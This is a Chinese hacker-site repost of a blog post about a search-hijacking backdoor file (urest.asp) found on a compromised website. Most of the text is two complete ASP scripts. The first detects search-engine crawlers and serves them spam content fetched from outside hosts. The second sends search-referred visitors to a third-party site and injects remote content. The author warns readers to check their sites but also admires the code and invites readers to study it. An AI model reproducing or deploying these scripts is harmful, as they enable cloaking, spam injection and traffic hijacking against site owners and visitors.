记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

让百度收录剧增的黑链代码,新发现的黑链[百度劫持-备份研究文章]

2013-03-15 16:35
今天偶尔检查一下朋友的网站,晕死,打开后谷歌浏览器提示说被挂马了,我看了看源码,多了一个JS,代码如下: ,还好 该网站已经打不开了,不会有什么影响,但是 我在百度SITE一下,哇卡,居然增加了几百个链接,全是一些非法的链接,而且很本站没有任何关系,我自己看了下源码,又是一个新发现呀,只是在该网站上了放了一个文件,所有的索引全部来自别人的域名,但是收录却是这个网站的,而且 百度等搜索引擎抓取的只是内容,点击链接进去的又是跳转的显示的资料,很厉害呀!难怪有人说 互联网的发展来源于色情业的兴起,那么互联网的创新一定是来源于那些所谓的灰色事业违法 非法事业!这个让百度收录剧增的黑链代码,新发现的黑链,大家可以研究研究!和百度劫持的代码有的一拼哦

提醒下,看看你的网站下有没有这个urest.asp文件,别被人阴了都不知道呀 哈哈

<%

Function check(u)

Dim a, i

a = split("Baiduspider,Sogou,baidu,Sosospider,Googlebot,FAST-WebCrawler,MSNBOT,Slurp", ",")

check = false

For i = 0 to ubound(a)

if instr(u, a(i)) > 0 then check = true:Exit For

Next

End function

 

 

 

Function checkw(w)

Dim a, i

a = split(" /index.asp, /default.asp", ",")

checkw = false

For i = 0 to ubound(a)

if instr(a(i),w) > 0 then checkw = true:Exit For

Next

End function

 

gg="2222"

m=Request.ServerVariables("URL")

if checkw(m) = true then 

gg="1111"

end if

 

Dim u, h, str, x, s

u = Request.ServerVariables("HTTP_USER_AGENT")

h = Request.ServerVariables("HTTP_HOST")

if check(u) then

url="http://wz1.yfycy.com/"&gg&".php?g=12&a="&Lcase(h)&"&b="&Server.URLEncode(Lcase(Request.ServerVariables("QUERY_STRING")))&"&p=" & Server.UrlEncode(Request.ServerVariables("URL")) & "&u="&Request.ServerVariables("REMOTE_ADDR")

Set x = Server.CreateObject("MSXML2.ServerXMLHTTP")

x.setTimeouts 30000, 30000, 60000, 60000

x.Open "GET",url, False

x.setRequestHeader "User-Agent", u

x.send

str = x.responseBody

Set x = Nothing

if Not IsEmpty(str) And Len(str) > 0 then

Set s = Server.CreateObject("Adodb.Stream")

s.Type = 1

s.Mode = 3

s.Open

s.Write str

s.Position = 0

s.Type = 2

s.Charset = "gb2312"

str = s.ReadText

s.Close

Set s = Nothing

end if

url2="http://nnl.yjcmp.com/llll.php"

mcc=wjzhua(url2)

yy=wjdu(mcc)

response.write str

response.write  yy

response.end()

 

else 

 

e =Request.Servervariables("HTTP_REFERER")

url1="http://d1.mierya.com/n/ipush.asp?e="&e

myu=wjzhua(url1)

yyy=wjdu(myu)

response.write yyy

End If 

 

function wjdu(dizhi)

set objStream = Server.CreateObject("Adodb.Stream")

objStream.Type = 1

objStream.Mode =3

objStream.Open

objStream.Write dizhi

objStream.Position = 0

objStream.Type = 2

objStream.Charset = "gb2312"

wjdu=objStream.ReadText

end function

 

function wjzhua(dizhi)

Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")

ObjXMLHTTP.setTimeouts 30000, 30000, 60000, 60000

ObjXMLHTTP.Open "GET",dizhi,False

ObjXMLHTTP.setRequestHeader "User-Agent",dizhi

ObjXMLHTTP.send

wjzhua=ObjXMLHTTP.responseBody

Set ObjXMLHTTP=Nothing

end function

%>

 


 

 

 

 

还有一种高级的代码 这些都是ASP的   

 

 

<%

Function GetUrl()

dim url

url=Request.ServerVariables("SERVER_NAME")

Set reg = New RegExp

reg.Pattern = "^(?:http)?s?(?:://)?(?:www.|*.|.)?(.*)$"

reg.Global = True

reg.IgnoreCase = True

GetUrl = reg.Replace(url,"$1")

End Function

 

Dim REFERER

REFERER = Cstr(Request.ServerVariables("HTTP_REFERER"))

If InStr(REFERER,"baidu") > 0 Or InStr(REFERER,"google") > 0 Or InStr(REFERER,"soso") > 0 Or InStr(REFERER,"sogou") > 0 Then

Response.Redirect("http://www.czwdsl.com/2012.html?#22111"&GetUrl&"")

Response.End()

End IF

response.write content

%>

<% 

url="http://seo.jinri5678.com/top/gov.asp?jjdjdjd"

Path = url &  "?"  &  now()

t = GetBody(Path) 

Response.BinaryWrite t 

 

Function GetBody(url)

Set Retrieval = CreateObject("Microsoft.XMLHTTP") 

With Retrieval 

.Open "Get", url, False, "", "" 

.Send 

GetBody = .ResponseBody 

End With 

on error resume next 

if Retrieval.status <>200 then 

Set Retrieval = Nothing 

exit function 

end if 

End Function 

%>




知识来源: www.hackqing.com/index.asp?FoxNews=849.html

阅读:136977 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“让百度收录剧增的黑链代码,新发现的黑链[百度劫持-备份研究文章]”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云